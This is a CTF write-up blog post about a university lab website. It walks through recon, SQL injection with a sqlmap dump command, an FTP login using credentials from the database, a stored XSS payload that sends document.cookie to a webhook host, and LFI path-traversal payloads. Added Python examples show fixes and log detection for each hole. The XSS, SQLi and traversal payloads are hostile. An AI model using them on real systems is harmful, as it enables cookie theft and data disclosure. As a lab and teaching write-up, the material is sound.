
Hackwekend - Session 1 (Pentester web - Security Lab)

tags: ctf network exploits vulnerable top10owasp

Hi, I am back with the university CTF series LOL. Sorry for being late; it took me two weeks to solve all the flags on the website. So let's get into it and try to learn something new.

1. Recon Progress:

  • In this step I do the usual recon stuff: how the website works, what tech it is built on, which ports are open, and whether there are any subdomains LOL.
  • Start by searching the website's directories with dirsearch, one of the best choices for enumerating directories. It is written in Python, so download it and run it with Python.
  • The dirsearch result usually turns up cool stuff:
    • We find a hidden path, /.gitignore, with a 200 response. A good signal on recon, so try ctf.wheelife.net/.gitignore
    • Yup, we find flag 1 in the hidden file. Cool stuff for a challenge.

Flag1: Flag{ozIA3akOT7NcAwTa}

  • Second recon step: use nmap to check which ports are open.
    • Now we know two ports are open on this host: 21 (maybe helpful in a later step) and, obviously, 80.
    • Situation: can we predict why port 21 is open?
  • Next step: check what the website is built with, like programming language, framework, server, OS, blah blah?
    • It is a very easy config: the website is just written in PHP and hosted on Apache2 on Ubuntu LOL.
    • That spoils a lot for us. How do we reach deeper into the website? Knowing the full tech stack of a website has a high impact.

Conclusion

  • Two ports open: 21 and 80
  • Written in PHP and hosted on Apache2 on Ubuntu
  • Got flag 1 on a hidden route

2. Exploitation Progress (GG everything)

SQLi Exploit

  • Looking around we see get_wards.php, which is really strange and could well have SQLi: http://ctf.wheelife.net/get_wards.php?district_id=1. So try an easy test like ' OR 1=1 and, yes, it clearly has SQLi: http://ctf.wheelife.net/get_wards.php?district_id=1%20OR%201=1--%20-
  • So we know one thing: use sqlmap, a powerful tool for scanning SQL injection, to dump the whole database and get every table with the command sqlmap -u ctf.wheelife.net/get_wards.php?district_id=1 --dump
    • With that command we get the config table, which is really helpful: it holds the second flag and the FTP login information.
    • Second, we now know the password for the login form, but we would need to know how it is hashed (MD4, MD5, SHA-256); one thing I think is that it is not helpful anyway.
    • There is a table like comment, which links to comment.php.
    • And yup, I have the second flag and can reach the FTP server to see what it has.

Flag 2: Flag{1NecwrX6WaeCHJmx}
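
Added example (not code from this write-up or from the challenge site): the pattern behind get_wards.php, shown as a vulnerable query beside its fixed form, plus a small check that can run over access-log request lines. Python and an in-memory sqlite3 database stand in for the PHP/MySQL endpoint; the wards table, its rows and the column names are constructed here and are not the challenge's real schema.

```python
import sqlite3
from urllib.parse import parse_qs, urlsplit


def build_db() -> sqlite3.Connection:
    """Constructed stand-in for the database behind get_wards.php (not the real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE wards (id INTEGER, district_id INTEGER, name TEXT);
        INSERT INTO wards VALUES (1, 1, 'Ward A'), (2, 1, 'Ward B'),
                                 (3, 2, 'Ward C'), (4, 3, 'Ward D');
        """
    )
    return conn


def get_wards_vulnerable(conn: sqlite3.Connection, district_id: str) -> list:
    """The bug: the query-string value is pasted into the SQL text.

    district_id=1 OR 1=1-- - turns the WHERE clause into 'district_id = 1 OR 1=1'
    followed by a comment, so every row comes back; sqlmap builds on the same hole.
    """
    sql = f"SELECT name FROM wards WHERE district_id = {district_id}"
    return [row[0] for row in conn.execute(sql)]


def get_wards_fixed(conn: sqlite3.Connection, district_id: str) -> list:
    """The fix: validate the type, then bind the value as a query parameter."""
    try:
        did = int(district_id)  # "1 OR 1=1-- -" fails here with ValueError
    except ValueError:
        raise ValueError("district_id must be an integer") from None
    # The placeholder keeps the value out of the SQL grammar entirely, so this
    # would stay safe even for a string column; int() is the extra check.
    sql = "SELECT name FROM wards WHERE district_id = ?"
    return [row[0] for row in conn.execute(sql, (did,))]


def suspicious_id_params(request_line: str) -> list:
    """Detection side: given a request line from an access log, return the *_id
    parameters whose URL-decoded value is not a plain integer.

    "GET /get_wards.php?district_id=1%20OR%201=1--%20- HTTP/1.1" -> ['district_id']
    """
    target = request_line.split()[1]
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return [k for k, vals in params.items()
            if k.endswith("_id") and any(not v.strip().isdigit() for v in vals)]


if __name__ == "__main__":
    db = build_db()
    print(get_wards_vulnerable(db, "1"))             # ['Ward A', 'Ward B']
    print(get_wards_vulnerable(db, "1 OR 1=1-- -"))  # all four wards leak
    print(get_wards_fixed(db, "1"))                  # ['Ward A', 'Ward B']
    try:
        get_wards_fixed(db, "1 OR 1=1-- -")
    except ValueError as e:
        print("rejected:", e)
    print(suspicious_id_params("GET /get_wards.php?district_id=1%20OR%201=1--%20- HTTP/1.1"))
```

The same request that dumps the table through the vulnerable function is rejected before it reaches the database in the fixed one, and the log check flags it with nothing more than the request line, which is what an Apache access log already records.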

FTP exploit

  • Basically, the machine runs an FTP service and you need to connect to it, so use a command like ssh: ftp ctf.wheelife.net
  • Type the username and password and log in with username:ftpuser - password:Ubuntu_2022_ftpuser
  • Once logged in, run more files/.flag (the port scan earlier showed port 21 open).

Flag 3: Flag{AMFVGVLzhHBNXMAb}

XSS exploit

  • As I know from the sqlmap output, the comment table is loaded somewhere, so with the hint it can be used to steal a cookie.
  • On that page we can see two inputs, Name and Content, but they only give reflected XSS. One thing to focus on is the IP column: it can be stored XSS. So yup, use the payload below and the cookie comes back, sending it via the X-Forwarded-For header:
<script>fetch('https://webhook.site/4a85e2af-96a5-454fbd93-fbc0065daa8d/' + document.cookie)</script>
  • Result: flag=Flag{/xpeihQtrM+4HRBI}
  • So we get flag 4, and yup, it is really cool stuff when we get that.

Flag 4: Flag{/xpeihQtrM+4HRBI}
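
Added example, not from the write-up or the challenge: how the comment page could avoid storing X-Forwarded-For as arbitrary text, and how to spot forged headers in a log. The log format (peer host, X-Forwarded-For, request line, status) and the log lines are constructed for the demo; attacker.example is a placeholder, and the assumption that the application sits behind a proxy that appends the client address is stated in the code.

```python
import html
import ipaddress
import re
from typing import List, Optional, Tuple


def parse_forwarded_for(header: Optional[str]) -> List[str]:
    """Parse X-Forwarded-For strictly: a comma-separated list of IP literals or nothing.

    ipaddress.ip_address raises ValueError on anything that is not an IP address,
    so a header carrying markup is rejected as a whole instead of being stored.
    """
    if header is None:
        return []
    chain = []
    for element in header.split(","):
        element = element.strip()
        if not element:
            raise ValueError("empty element in X-Forwarded-For")
        chain.append(str(ipaddress.ip_address(element)))
    return chain


def client_ip_for_storage(remote_addr: str, forwarded_for: Optional[str]) -> str:
    """What the comment table's IP column should receive.

    Assumption: the app sits behind a proxy that appends the real client address,
    so the first element is taken. Anything that does not parse falls back to the
    socket peer address, which the client cannot forge.
    """
    try:
        chain = parse_forwarded_for(forwarded_for)
    except ValueError:
        return remote_addr
    return chain[0] if chain else remote_addr


def render_ip_cell(ip: str) -> str:
    """Second line of defence: encode on output even though the value was validated."""
    return "<td>" + html.escape(ip, quote=True) + "</td>"


# Constructed access-log format: %h "%{X-Forwarded-For}i" "%r" %>s  (Apache writes "-"
# when the header is absent). The lines below are made up for the demo.
LOG_RE = re.compile(r'^(?P<host>\S+) "(?P<xff>[^"]*)" "(?P<req>[^"]*)" (?P<status>\d{3})$')
FORGED_XFF = "<script>fetch('https://attacker.example/'+document.cookie)</script>"
SAMPLE_LOG = [
    '10.0.0.5 "203.0.113.7" "POST /comment.php HTTP/1.1" 200',
    '10.0.0.5 "203.0.113.7, 198.51.100.2" "GET /comment.php HTTP/1.1" 200',
    f'10.0.0.9 "{FORGED_XFF}" "POST /comment.php HTTP/1.1" 200',
    '10.0.0.9 "-" "GET /index.php HTTP/1.1" 200',
]


def find_forged_xff(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (peer address, header value) for every X-Forwarded-For that is not IPs."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m.group("xff") == "-":
            continue
        try:
            parse_forwarded_for(m.group("xff"))
        except ValueError:
            hits.append((m.group("host"), m.group("xff")))
    return hits


if __name__ == "__main__":
    print(client_ip_for_storage("10.0.0.9", FORGED_XFF))  # 10.0.0.9, header discarded
    print(render_ip_cell(FORGED_XFF))                      # markup is encoded
    for peer, value in find_forged_xff(SAMPLE_LOG):
        print("forged X-Forwarded-For from", peer, ":", value)
```

Validating the header as a list of IP addresses removes the stored-XSS path entirely, since nothing but an IP literal ever reaches the database; the output encoding is there so that a future column that does hold free text does not reopen it. The log scan only makes sense if the proxy logs the header as received, which is why the LogFormat above includes it.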

LFI exploit

  • With the cookie above I can reach the admin page endpoint; change the cookie with anything like Burp Suite or Firefox, reach the end and we get a surprise.
  • It has some routes to move around, but focus on the image: we can see it loads something very strange, and there may be LFI there.
  • Trying the Repeater tab in Burp Suite, I can see it loads file content from the web folder, and yet we can get the image, so I know it has LFI.
  • Try a basic payload like: file=../../../etc/passwd and yup, we get what we want: a PoC of the LFI.
  • So GG time. As I know the website is written in PHP and hosted on Apache2, something from this page can lead me to the source code: Solution to host LAMP web
  • So I have an idea about that: we can try payloads like

file=../../../var/www/wheelife/index.php - 500 ERR
file=../../../var/www/ctf/index.php - 200

  • So yet we got the source, and it reaches a super strange route: /page.php
  • The important line: $ini = parse_ini_file('web.conf');. It gives me the idea that a file web.conf exists, so reach for that and I find a real surprise.
  • A subdomain, api.wheelife.net, has flag.php, but it is just a decoy, so that gives me nothing; there must be some secret in flag.php in the file that I can't see.
  • So reach that with file=../../../var/www/api/flag.php and yup, the secret is spoiled.

Flag 5: Flag{J3Gzrh18YP9kUig3}
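
Added example, again not the challenge's own code: a resolver for a ?file= image parameter that cannot be walked out of the image directory, plus an audit that lists configuration files like web.conf sitting under the document root where any traversal bug can read them. The temporary web root, the web.conf contents, the images/ layout and the one-line index.php are all constructed for the demo; the helper names are mine.

```python
import tempfile
from pathlib import Path
from typing import List

ALLOWED_SUFFIXES = {".png", ".jpg", ".jpeg", ".gif"}
RISKY_SUFFIXES = {".conf", ".ini", ".env", ".bak", ".sql"}


def resolve_image(webroot: str, requested: str) -> Path:
    """Map a ?file= value onto a file strictly inside <webroot>/images.

    Assumed layout: images live in webroot/images. Only the final path component
    is honoured, the result is canonicalised, and it must still sit under the
    image directory and carry an image extension before it is served.
    """
    if not requested or "\x00" in requested:
        raise ValueError("empty or NUL-containing file name")
    name = Path(requested).name  # "../../../etc/passwd" -> "passwd"
    if name in ("", ".", ".."):
        raise ValueError("no file name given")
    base = Path(webroot, "images").resolve()
    # resolve() follows symlinks, so a planted link cannot escape either
    candidate = (base / name).resolve()
    if base not in candidate.parents:
        raise ValueError("path escapes the image directory")
    if candidate.suffix.lower() not in ALLOWED_SUFFIXES:
        raise ValueError("not an image: " + name)
    if not candidate.is_file():
        raise FileNotFoundError(name)
    return candidate


def is_rejected(webroot: str, requested: str) -> bool:
    """True when resolve_image refuses to serve the requested value."""
    try:
        resolve_image(webroot, requested)
    except (ValueError, FileNotFoundError):
        return True
    return False


def audit_webroot(webroot: str) -> List[str]:
    """List files under the document root that look like configuration or backups.

    parse_ini_file('web.conf') with a relative name means web.conf sits next to the
    PHP, i.e. inside the document root, where a traversal bug can read it; moving
    it above the root removes it from this list and from reach of the ?file= bug.
    """
    root = Path(webroot)
    found = [str(p.relative_to(root)) for p in root.rglob("*")
             if p.is_file() and (p.suffix.lower() in RISKY_SUFFIXES or p.name.startswith("."))]
    return sorted(found)


def build_demo_webroot() -> str:
    """Constructed document root for the demo; nothing here is from the challenge."""
    root = Path(tempfile.mkdtemp(prefix="lfi-demo-"))
    (root / "images").mkdir()
    (root / "images" / "logo.png").write_bytes(b"\x89PNG\r\n\x1a\n")
    (root / "index.php").write_text("<?php $ini = parse_ini_file('web.conf'); ?>\n")
    (root / "web.conf").write_text("[db]\npassword = PLACEHOLDER_NOT_A_REAL_SECRET\n")
    return str(root)


if __name__ == "__main__":
    root = build_demo_webroot()
    print(resolve_image(root, "logo.png"))
    for probe in ("../../../etc/passwd", "../web.conf", "../../../var/www/api/flag.php"):
        print(probe, "rejected:", is_rejected(root, probe))
    print(audit_webroot(root))  # ['web.conf']
```

Taking only the final component plus the containment check after resolve() closes both the ../ walk and symlink tricks; the extension allow-list is what stops the PHP source and web.conf from being read even when they sit right next to the images. The audit is the cheap check to run on any LAMP deploy: anything it lists is one traversal bug away from disclosure.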

Conclusion

The CTF was quite fun, but sometimes we wait too long to get a result, or find the endpoint just by guessing; still, it took a reasonable amount of time and there was not much time to upgrade the level. But I was happy to do it, and it gives more chances to upgrade to a higher level. Hoping you got some very cool stuff from this WU. Happy hacking !!!